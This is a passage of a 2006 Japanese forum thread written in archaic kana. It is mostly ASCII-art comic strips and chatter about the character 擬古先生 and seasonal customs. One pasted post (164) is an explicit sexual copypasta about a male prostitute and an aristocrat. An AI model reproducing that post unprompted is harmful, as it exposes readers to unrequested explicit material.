End Sub


133 :( ´∀`)さん:2006/11/20(月) 20:38:22 ID:ZZxpp/qe0
| >>132
\ 全くだ。
  \ 然し、何処から湧き出づるのか?
     ̄V ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   ∧ ∧
   (#゚Д゚) y━~
   / y~|⊃
 〜(_|⊃)

134 :( ´∀`)さん :2006/11/20(月) 21:27:42 ID:c1600fbu0
智慧と智識といふのは改めて違ふものであるなぁ。

智識があつてもこのやうな事をするのでは、
智慧がないとしか言ひやうがないのだらうね。

135 :( ´∀`)さん:2006/11/20(月) 22:19:51 ID:H/aUNYSb0
先生、酉の市はもう行かれましたか?
―――ヽ――――――――――――――
       今年は三の酉まであるな。火事が起こらねばいゝが
      ――――――y――――――――――――

        | |            .|
    ∧_∧ |―― ∧∧─―〇|
   ( ´∀`) |   (゚Д゚,,)    |
__< ! y   >|    ( /つl⌒l⌒l |
 _∧_/~~ ~ノJ   (  ノつ)| ̄ ̄ ̄|
 |_| し| ̄ ̄ ̄ ̄ ̄ ̄ ̄

136 :( ´∀`)さん:2006/11/20(月) 22:30:52 ID:EeFPfIH20
      ∧_殺
      (◎∀θ)
      (    丶┬─   
      │ │ │      
      (_ (_)   
     
     【ころネコ】
   のまネコ・まもネコを
   敵対するナゾのやつ

137 :( ´∀`)さん:2006/11/20(月) 23:05:52 ID:KqonygeL0
1/4

/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| 擬古先生、三の酉がある年には火事が多いと云はれてゐますが
| 何か根據や背景でもあるのでせうか?

   ̄ ̄ ̄|/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
        | |
    ∧_∧ |―― ∧∧─―∬
   ( ´∀`) |   (゚Д゚,,)っ━・
__< ! y   >|    ( y ノ|  三
 _∧_/~~ ~ノJ   (  ノつ)| ̄ ̄ ̄|
 |_| し| ̄ ̄ ̄ ̄ ̄ ̄ ̄
             /|
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| 諸説あつてどれが本當とは斷言できぬが、一番具體的な説によると
|
| 「三の酉の日は必ず十一月の末頃、空氣も乾くし、寒いので火も使ひ始める頃だ。
| その分火の廻りも速くなるから、取扱ひには充分氣をつけよ」、といふ事らしい。
\___________________________________


138 :( ´∀`)さん:2006/11/20(月) 23:06:32 ID:KqonygeL0
2/4

/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| 火事は恐ろしいですからね。擬古先生も氣をつけてくださいよ。

   ̄ ̄ ̄|/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
        | |
    ∧_∧ |―― ∧∧─― ポテツ
   ( ´∀`) |   (Д^,,)っ━ミ.
__< ! y   >|    ( y ノ|  三
 _∧_/~~ ~ノJ   (  ノつ)| ̄ ̄ ̄|
 |_| し| ̄ ̄ ̄ ̄ ̄ ̄ ̄
             /|
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| 何を言つてをる。我輩はそんなにうつかりしてはおらんぞ。
| ミヰだつて火の始末はしつかりこなしてゐるし、心配はいらぬ。ギコハハ/\
\_|\_____________________________
 /
 | さいですよね。擬古先生夫妻は何事にも氣配りをしてゐますもの。
 \____________________________


139 :( ´∀`)さん:2006/11/20(月) 23:07:08 ID:KqonygeL0
3/4

\_WWWWWWWWWWWWWWWWWWWWWWW/
≫                          ≪
≫ つて擬古先生!!一寸!          ≪
≫ 原稿!机煙草!火!!原稿!煙草!! ≪
≫                          ≪
/MMMM| /MMMMMMMMMMMMMMMMMM、\
       |/
        | | クルツ
  Σ∧_∧ |―― ∧∧?  ∬
   (; ゚ ∀゚) |  ミ(,,゚Д)っ━ 、_, ヂユウゥ
__< ! y   >|    ( y ノ|  ニ
 _∧_/~~ ~ノJ   (  ノつ)| ̄ ̄ ̄|
 |_| し| ̄ ̄ ̄ ̄ ̄ ̄ ̄
             /|
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| 何だ茂名男。人に話をする時はまづ落ち着k…
\_____________________


140 :ノスタルヂヤ ◆djUyVCCSh2 :2006/11/20(月) 23:07:49 ID:KqonygeL0
4/4


           次 の 日  …



/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| で、今週號の分は休載扱ひにしておいて慾しい、と…

   ̄ ̄ ̄|/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

                                  /ノ人ヽ ウチノ ヒトツタラ…
    ∧_∧    カンベン シテクダサイ          /つー゚;)
   (; ´_ゝ`)          ∧∧←※擬古先生  ヽ y )
   (o.{胤} )         ('Д`;)           |,,,,,,||>
   ■| | |          ノノ 乙          |  ノゞ
   ( ̄.) ̄)       | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                  /|
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| 焦がした原稿を一日で思ひ起こすなんて無理だつたんです。
| どうか體調でも崩した事にしてくれませんか。それに今年は三の酉が…
\______________________________        〜 糸冬 〜


141 :あぼーん:あぼーん
あぼーん

142 : ◆1IMMMMMMMM :2006/11/21(火) 06:19:07 ID:KWq/zGl70
  ∧∧
  (,,゚ω゚) むむむ
  く i y u>
  /_/l_|┃
   .U O┃

143 :( ´∀`)さん:2006/11/21(火) 17:00:54 ID:otKvKt0A0
ノスタルヂヤ ◆djUyVCCSh2殿、いつもながらお見事でございます。

144 :( ´∀`)さん:2006/11/21(火) 20:50:56 ID:uh8VCGFV0
ノスタルヂヤ先生お疲れ様で御座います
火の用心の季節になつて参りましたですね
どなた様も息災でお過ごし下さいませ。

145 :( ´∀`)さん:2006/11/22(水) 08:25:09 ID:uC1cGejk0
>>137-140
イイ!!
特に落ちが秀逸ですな。


146 :( ´∀`)さん:2006/11/24(金) 04:16:26 ID:cGhistqh0
早目の保全作業也

147 :( ´∀`)さん:2006/11/25(土) 12:52:26 ID:RVnYiHH30
       

148 :あぼーん:あぼーん
あぼーん

149 ::2006/11/27(月) 17:15:15 ID:pda90n4V0
以前にも書かせて貰居り候得共、>>126殿の樣な御意見を頂きますと、
尋常ならざる程に嬉しく存知上候。今後も刷れが盛り上がると良いですな

150 :( ´∀`)さん:2006/11/29(水) 01:26:09 ID:TgJKiaBw0
早目の保全作業

151 :( ´∀`)さん:2006/11/29(水) 11:43:38 ID:W2Alj0Ru0

 \ イチサソ        /
 \  アリガタウ アリガタウ /
    ∧∧  ∧ ∧
   (*゚∀゚)  (,*゚∀)
  〜(,__) 〜(,__)

152 :( ´∀`)さん:2006/11/29(水) 23:55:51 ID:0/fQ4kNo0
ヾ(o゚ω゚o)ノ゙ プニプニ!プニプニ!

153 :( ´∀`)さん:2006/11/30(木) 19:45:52 ID:YGkk7fuS0
明日から師走ですが、先生、お約束のあれはやるんですか?
―――ヽ――――――――――――――
      また我輩を走らせる氣か!まう止めて呉れ給へ 
      ――――――y――――――――――――

        | |            .|
    ∧_∧ |―― ∧∧─―〇|
   ( ´∀`) |   (゚Д゚,,)    |
__< ! y   >|    ( /つl⌒l⌒l |
 _∧_/~~ ~ノJ   (  ノつ)| ̄ ̄ ̄|
 |_| し| ̄ ̄ ̄ ̄ ̄ ̄ ̄

154 :( ´∀`)さん:2006/12/01(金) 09:43:42 ID:piW8SrGj0
>>153
と言ひつゝ、擬古先生は走つて仕舞ふやうな氣がしてなりません(笑

155 :( ´∀`)さん:2006/12/03(日) 00:24:55 ID:YGhzlQ5A0
∧ ∧
ミ ゚Д゚ミ∧ 保守る
∩ヽ/||⌒!つ



∧ ∧
ミ゚Д゚ミ∧
∩ヽ/||⌒!つ

156 :( ´∀`)さん:2006/12/03(日) 00:37:47 ID:xu+O3Eg10
∧ ∧   こつちを見ないで呉れたまへ
( ゚Д゚)∧
∩ヽ/||⌒!つ

157 :( ´∀`)さん:2006/12/03(日) 22:10:57 ID:ORP0gSAD0
       ∧∧          ∧∧
       (* ゚∀)  ∧∧    (゚A゚*)    ∧∧
      < つl⌒l⌒l(゚*  )━━━━━┳━ (∀゚*)
      ( /つ ┃ (__〜   .(   つ┃  (__,)〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄





       ∧∧          ∧∧
       (,゚∀゚,)  ∧∧    (,゚A゚,)    ∧∧
      < つl⌒l⌒l(,゚∀゚,)━━━━━┳━ (,゚∀゚,)
      ( /つ ┃ (__〜   .(   つ┃  (__,)〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄


158 :( ´∀`)さん:2006/12/03(日) 22:25:31 ID:Q01ZdL9M0
  ∧ ∧
 (;゚Д゚)∧
 ∩ヽ/||⌒!つ

159 :( ´∀`)さん :2006/12/04(月) 20:34:42 ID:Vp4uj3Bo0
うゝむ、家族皆こつちを向いてゐるといふのは怖い画であるなぁ

160 :( ´∀`)さん:2006/12/04(月) 21:35:54 ID:rH4VEbed0
いやぁ、まつ度くですなぁ

161 :( ´∀`)さん:2006/12/06(水) 11:48:48 ID:tqkjZvkl0
/
曲<大本營發表
   吾が精鋭なる帝國陸軍第五歩兵聯隊は
   敵の頑強なる抵抗を卻け逝手葦に至り
       ∧∧          ∧∧
       (* ゚∀)  ∧∧    (゚A゚*)    ∧∧
      < つl⌒l⌒l(゚*  )━━━━━┳━ (∀゚*)
      ( /つ ┃ (__〜   .(   つ┃  (__,)〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

162 :( ´∀`)さん:2006/12/07(木) 04:11:58 ID:5H2tLRkX0
  ∧ ∧
  (,,゚ω゚,,) むむむ
  く i y u>
  /_/l_|┃
   .U O┃


163 :( ´∀`)さん:2006/12/07(木) 11:51:31 ID:5qDN3l430
HDDあさってたら大昔の没ネタが出てきた。
なんだか非常にいとおしいのでAAに成ってないけど投下。

先生不在

( ´_ゝ`) 先生、原稿をとりに伺ゐました
(*゚ー゚)  あら/\浮雲さん、主人はたつた今散歩に出かけたんですよ。
( ´_ゝ`) 然樣ですか。
(*゚ー゚)  じきに戻ると思ひますから上がつてお待ちになつてください。
( ´_ゝ`) いえ/\其れには及びません。こゝで待ちませう。
(*゚ー゚)  さうですか……
( ´_ゝ`) ……
(*゚ー゚)  ところで浮雲さん、ギターをおやりになるんですつてね。
( ´_ゝ`) えゝつ?
(*゚ー゚)  この間ラジオで聞きましたのよ。何でも昨年から椎名林檎女史の樂團に入られたとか……
( ´_ゝ`) それは浮雲(ウキグモ)さん、私は浮雲(フウン)です……
(,,゚Д゚)   唯今歸つたぞ〜

※浮雲(ウキグモ):ギタリスト。第二期東京事変のギター担当。
参考:http://ja.wikipedia.org/wiki/%E6%9D%B1%E4%BA%AC%E4%BA%8B%E5%A4%89

164 :( ´∀`)さん:2006/12/09(土) 07:12:25 ID:BMKcrLsIO
660:水先案名無い人 :2006/12/08(金) 12:44:36 ID:Zd8NjqNE0 [sage]
さつき、お屋敷でご相伴に預からせて頂ひた六尺坊ちゃま、お優しゆうございました!
爽やかに日焼けなされたスポオツマンのお坊ちゃまがごきげんやう連呼で張型を菊門に入れられて柳腰をお振りになつておりました。
蔭間のわたくしもくわえさせて頂ひて浣腸をして頂き、不躾ながら排便をさせて頂きました。
やわら独逸舶来のバリカンをお出しになられたときは少しだけ戸惑いましたが、坊ちゃまの「おいやなら
お止めになつても、誰も怒りませんよ…!!!1!!」との気遣ひのお言葉で覚悟を決めさせて頂き、生まれて初めて丸刈りになったのでございます。
その後、脇や性毛もスツキリ刈って頂き、恥ずかしながらビンゝの陽物、思うさまにしごかれ華やかに
埒を開け、逞しい坊ちゃまのかんばせに気をやってしまいました。
さすがに旧華族のウホッらしくハイカラでございました。また衆道の宴を開かれるときは
呼び付けて頂けたら望外のよろこびでございます!おいとましましてからツルゝの丸刈りの頭を見て、
また楽しかつた逢瀬の思い出に浸っております!

165 :( ´∀`)さん:2006/12/09(土) 17:07:04 ID:o+4JaKOx0
>>163殿
  ∧_∧
 ( ´_ゝ`)
 (o.{胤} )
 ■| | |
 ( ̄.) ̄)
浮雲 【初代】

この方のお名前は【ふうん】殿とお讀みするのですか。
今まで存じませんでした

166 : ◆1IMMMMMMMM :2006/12/10(日) 14:18:47 ID:G1JzgvgZ0
  ∧∧
  (,,゚ω゚) むむむ
  く i y u>
  /_/l_|┃
   .U O┃


167 :( ´∀`)さん:2006/12/10(日) 20:16:29 ID:XfOYYNbW0
  ∧ ∧
  (,,゚ω゚,,) 市電を待つてゐる處だ
  く i y u>
  /_/l_|┃
   .U O┃

168 :( ´∀`)さん:2006/12/12(火) 13:58:31 ID:3CqcBc9K0
早めに保全

169 : ◆1IMMMMMMMM :2006/12/13(水) 03:03:01 ID:wR8C3kRG0
  ∧∧
  (,,゚ω゚) むゝむ。
  く i y u>
  /_/l_|┃
   .U O┃


170 :( ´∀`)さん:2006/12/15(金) 00:38:03 ID:FG1mg/Uk0
早めの保全作業

171 :( ´∀`)さん:2006/12/15(金) 20:47:36 ID:uFlxSFwo0
そろ/\火鉢の要る季節ですな
──y────────────
                ||
.  ∧∧      。      ||
  (,,゚Д゚)    ‖      ||о__
  / y~|⊃┌──┐   .||###
〜(_|⊃) (::::::::::::::::)..   ||###
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

172 :( ´∀`)さん:2006/12/16(土) 05:32:21 ID:IgGC8MeH0
  :. : . : ./\: : . : .
  .   .: /   \: :. .
   : /      \: .
    ⌒⌒⌒|⌒⌒⌒: .
  :. ∧_∧ |
 ;  ( ´∀`)|  師走だといふのに雨が良く降りますなあ
   く  у つ
    ノノ川川
   (__)_)

173 :( ´∀`)さん:2006/12/16(土) 22:06:11 ID:1hJiuQjY0
先日、梨木香歩女史の「家守綺譚」を讀了しました。
なんだか、先生を思ひ出しちやつたなァ。
 ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                          ┃
   Λ_Λ      。   Λ Λ        ┃
  ( ´∀`)      ||   (゚Д゚,,)        ┃〇──‐
  < ______y__ > ┌──┐ < y  >       ┃###
  し|__)_)  (::::::::::::::::) ( /つ )     ┃###
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   ____________Λ_____
   我輩と主人公を一緒にするんぢやない。
   マァ、日々の生活と不可思議を上手く描いた作品ではあるがね。

174 : ◆1IMMMMMMMM :2006/12/17(日) 12:45:53 ID:v+kmeiDx0
  ∧∧
  (,,゚ω゚) むゝむ。reboot要請しました。
  く i y u>
  /_/l_|┃
   .U O┃

175 :( ´∀`)さん:2006/12/17(日) 17:53:55 ID:PCi7HMB+0
∧ ∧ 是れからの季節は變人が出沒せるから下げませう。
( ゚Д゚)∧
∩ヽ/||⌒!つ

176 :( ´∀`)さん:2006/12/18(月) 20:01:07 ID:5LS56Taj0
1/7


        ∧∧ ∧_∧
    __ (*゚ー゚)(   ・)
    \ヽ 〉つとl ( <Y> )
     | |_んんん l⌒l⌒l
     \___`∪∪ (__)_)        エツサ/\
      γ/⌒ヽヽ ___\   ( `Д)
      ( .i    l .)===========<--ヽ--
 -=≡  ヾ、二,''ノ ニ,''ノ   ε=  ノ ヽ

                                   オヤ/\、茂名男と椎子さんときたら、今日は俥で逢ひ引きか。
                                ∧∧  カフエーの制服以外を着た椎子さんは何處か目新しい物があるな。
                               (Д゚,, )

177 :( ´∀`)さん:2006/12/18(月) 20:01:44 ID:5LS56Taj0
2/7

                                              \  |  /
                                         ウフヽ
                                             ∧∧ ∧_∧
                                         __ (*^ー)(・∀・ ) ―
                                         \ヽ 〉つとl ( <Y> )
                                          | |_んんん l⌒l⌒l
                                          \___`∪∪ (__)_)
                                           γ/⌒ヽヽ ___\   ( `Д)
                                           ( .i    l .)===========<--ヽ--
                              -   -=   -=≡  ヾ、二,''ノ ニ,''ノ   ε=  ノ ヽ

                           Σ ∧∧ ア、アレ!?
                            (; ゚Д)  茂名男では無いでは無いか!?

178 :( ´∀`)さん:2006/12/18(月) 20:02:24 ID:5LS56Taj0
3/7

/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| エヽヒ、一寸そこの人力車、待つてくれ!
| 止まつてくれ!!
\                                 ウフヽ
   ̄ ̄ ̄ ̄ ̄ ̄\| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄            ∧∧ ∧_∧
              っ                   __ (*^ー)(* ・∀・)
           ∧∧ っ                   \ヽ 〉つ y つ <Y>と)
         __(;゚Д゚)7つ                    | |_んんん l⌒l⌒l
        ⊂|_ y _ノ                       \___`∪∪ (__)_)
         ノノノ-、ノ                        γ/⌒ヽヽ ___
     ダッ  ノノU                           ( .i    l .)=====
      == ∪                        =≡  ヾ、二,''ノ ニ,''ノ
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

                  アラ? アノカタハ… ∧∧  ∧_∧ 擬古先生ダモナ…
                          (* ゚ー) (Д`  )

179 :( ´∀`)さん:2006/12/18(月) 20:03:05 ID:5LS56Taj0
4/7

                        / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                        | 先生、そんなに急いで
                        | どちらへお出かけになるんですか
                        \
                           ̄ ̄ ̄\| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                                              __
          \从/                               \ヽ
           ∧∧               ∧∧  ∧_∧          | |_
           (;゚Д゚)つ               (゚ー゚*) (´∀` )         \___
          /つ .ノ              (uu ) と  y  )          γ/
  キキ/\  O川川               ノ   ヽ j川川川           ( .i
      ε= ε= ∪               ^U U^^(_(__)      =≡  ヾ、
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
         /|
/ ̄ ̄ ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| ア、アレ? 茂名男と…椎子さん!?
\_______________

180 :( ´∀`)さん:2006/12/18(月) 20:03:37 ID:5LS56Taj0
5/7


  _______________
  |                      |~~~~~~|
  |  →" ./  ┼" サ 麗 秀 味 佳 |     .|
  |. ー  ん'  .│こ 早. 演 自 作 自 |________|
  iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii|iiiiiiiiiiiii|
  ┃ |      \年ノ瀬モ 元氣ニ營業 イヽ!/
  ┃ |  o.o.o.o.o  (・∀・ )  .┃    |
  ┃ | o.o.o.o.o. ⊂l/ У⊂l ) ,.┃_  |
  ┃´ ̄========= ̄草團子8錢 ̄┃__| _
  | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|    |
  |                      .|    |

    ∧∧  ∧_∧  ∧ ∧
    (* ゚ー) ( ´〜`) .(〜-,,)
   (っ-∞ (  o_と) < y つ-∞
 ≡/⌒⌒≡川川川≡ノ川川≡≡≡
 廿^UU^^ (__(_)  U~U  廿

      /|
/ ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| ヘエ、そんなに椎子さんにソツクリな人がゐたんですか。 モグ/\
\__________|\__________________
         /
         | 「世の中に似た者は三人ゐる。」とは言ふが、
         | まるつきり同じ顏のやうに見えたぞ。アヽ驚いた。 ムシヤ/\
         \__________________________

181 :( ´∀`)さん:2006/12/18(月) 20:04:09 ID:5LS56Taj0
6/7
  |  →" ./  ┼" サ 麗 秀 味 佳 |     .|
  |. ー  ん'  .│こ 早. 演 自 作 自 |________|
  iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii|iiiiiiiiiiiii|
  ┃ |      \モウ 年末デスナ/   |
  ┃ |  o.o.o.o.o  (・∀・ )  .┃    |
  ┃ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ┃´.| それにしても先生がお走りになるなんて、
  | ̄|まさに『師走』に相應しい光景でしたわね。
  |   \_  _________________
       |/
    ∧∧  ∧_∧  ∧ ∧ っ
    (*^ー) ( ´∀`) .(# ゚Д)
   (っ-∞ (  o_と) < y つ-∞
 ≡/⌒⌒≡川川川≡ノ川川≡≡≡
 廿^UU^^ (__(_)  U~U  廿
      /|
/ ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| アヽさういへばさうでした/\。
| 擬古先生が走らない十二月なんて師走ぢやあ無いや。
\__________|\_______________
   /
   | ワ我輩だつて決して好き好んで走つたのではないぞ!
   |    …一應、>>153デ 拒否モ シテヰルシ
   \_______________________


182 :ノスタルヂヤ ◆djUyVCCSh2 :2006/12/18(月) 20:04:42 ID:5LS56Taj0
7/7
  ┃ |  o.o.o.o.o  (・∀・ )  .┃    |
  ┃ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ┃´.| そも/\あの女性が椎子さんに瓜二つだつたのがいけないのだ。
  | ̄|アレを見つけなければ今年こそ我輩は走らずとも…
  |   \______  _____________________
               \|
        \从/
  Σ ∧∧ ∧_∧  ∧∧   8               〜  ∧    醫者ハ 何處デスカ
    (* ゚o) ( ´Д`) .(Д-;)っ'             〜    /´。 `ーァ
   (っ-∞ (  o_と) < y ノ                   {  々 ゚l´ 
 ≡/⌒⌒≡川川川≡ノ川川≡≡≡        〜     / っy /っ
 廿^UU^^ (__(_)  U~U  廿               /_~~~~~|
                             〜    ∪^∪
    /|     /|
\_W/ |WWW/ |WWWWWWWWWWWWWW/
≫                       ≪
≫  アアツ!!               ≪
≫ 今度は擬古先生のソツクリさんが!! ≪
≫                       ≪
/MMMMMMMMMMMMMMMMMMMMM、\                 〜 ヲ ハ リ 〜

183 :( ´∀`)さん:2006/12/19(火) 02:12:48 ID:9UQ5KKII0
擬古先生、走つてしまはれましたか。笑
やはりこれがないと師走といふ氣が致しませぬな

しかし斜め氏と擬古先生……似てゐるのであらうか

∧ ∧
ミ ゚Д゚ミ∧
∩ヽ/||⌒!つ

184 :( ´∀`)さん:2006/12/19(火) 22:38:10 ID:a2nW8dIf0
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| オヽイ、ミヰや、
| 今日の夕飯は何にするんだ

   ̄ ̄ ̄|/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                  \. ||
    ∧ ∧               ||
     (,, ゚Д)       ハアイ   .||о__
    ( |=| ) ━┳         /  ||###
    ( /つ)  ||          ||###

185 :( ´∀`)さん:2006/12/19(火) 22:38:43 ID:a2nW8dIf0
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| 魚屋で良い鱈を買つたので煮付けてみやうと思つてゐますわ。
| あと、今朝の切干大根の煮物も少し殘つてるので、其れも…

   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
        。 。      ノヘハヾ .||  ガラツ
    ∧∧//      /゚々゚*`ハ||
     (,, Д)        ) y   つ||о__
    ( |=| ) ━┳   /____ノ_/ ..||###
    ( /つ)  ||    くく_つ  ||###


186 :( ´∀`)さん:2006/12/19(火) 22:39:16 ID:a2nW8dIf0
`〜〜〜〜〜〜〜〜〜〜〜 ○ 〜〜〜〜〜〜〜〜〜´
                O
               。
         \从/
          ∧∧    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   ガバツ   (;゚Д゚)  < !!!!!!! …ゆ、夢か……
       彡 ( つ つ  \_________
     ( /⌒⌒⌒⌒⌒ヽ
     \\ *  * * *\
       \\ *   * * \
        \\_*__*_.)
          `────―─'

187 :( ´∀`)さん:2006/12/19(火) 22:40:14 ID:a2nW8dIf0
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| マア貴男、今日はやけに卓袱臺から遠くにお坐りになるのね
| 私の顏に何か變な物でも付いてをりますか?

   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ∧∧           /ノ人ヽ.||
  (Д゚ ;)          (゚д゚*) ||о__
 ( つと )      ┳━┳(/  | ||###
 ( /つ)      ||  ||(  )⊃||###
   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
      |\
/ ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| ケ決してそんな事は無いんだが…
\______________
                                          〜 ヲ ハ リ 〜

188 :( ´∀`)さん:2006/12/20(水) 01:47:24 ID:M8fhNZpH0
是れは年末にいゝものを見せていたゞきました

189 :( ´∀`)さん:2006/12/22(金) 03:39:05 ID:PzQMn8jh0
>>187殿、乙で御座います

190 :( ´∀`)さん:2006/12/23(土) 21:57:40 ID:su7dTtxo0
天皇陛下、七拾三歳の御誕生日おめでたう御座います。

191 :( ´∀`)さん:2006/12/24(日) 20:27:08 ID:tjlSRoRH0
1/18


童話の代はりにとんでもなくシビヤな芥川を讀み聞かされた雙子のために、
童話を一つ投下し度しと存知上げ候。


二人への降誕祭プレゼントと洒落込んでみませうか。


        ∧∧   ∧∧
        (*゚∀゚)  (゚∀゚*)



192 :( ´∀`)さん:2006/12/24(日) 20:27:51 ID:tjlSRoRH0
2-3/18


数学の中に幾何というものがある。
幾何を学ぶにわ、是非とも定木が入る。その定木の中に、三角定木というのがある。
――これわ大方諸君も御存じでしょう。


           ____________
          ||                ||
          || γ ⌒ ヽ  積面の圓  ||
          ||  i    i    。   ∧_∧ ソモ/\ 円ト イフモノハ…ウンヌン
          ||  ヽ、_,ノ     \ (・∀・ )
          ||________⊂    つ 。
  ∧ ∧    ∧ ∧    ∧ ∧     || |
  (  ∧ ∧ (   ∧ ∧ (  ∧ ∧  (_(__)    o
〜(_(  ∧ ∧ __(  ∧ ∧__(    ∧ ∧
  〜(_(  ∧ ∧_(  ∧ ∧_ (  ∧ ∧       O
    〜(_(   ,,)〜(_(   ,,)〜(_(   ,,)
      〜(___ノ  〜(___ノ   〜(___ノ      ○


193 :( ´∀`)さん:2006/12/24(日) 20:28:24 ID:tjlSRoRH0
  ___________________ ○ _________________
/                                                        \
            /|
          /  |
         /   |
       /_   |
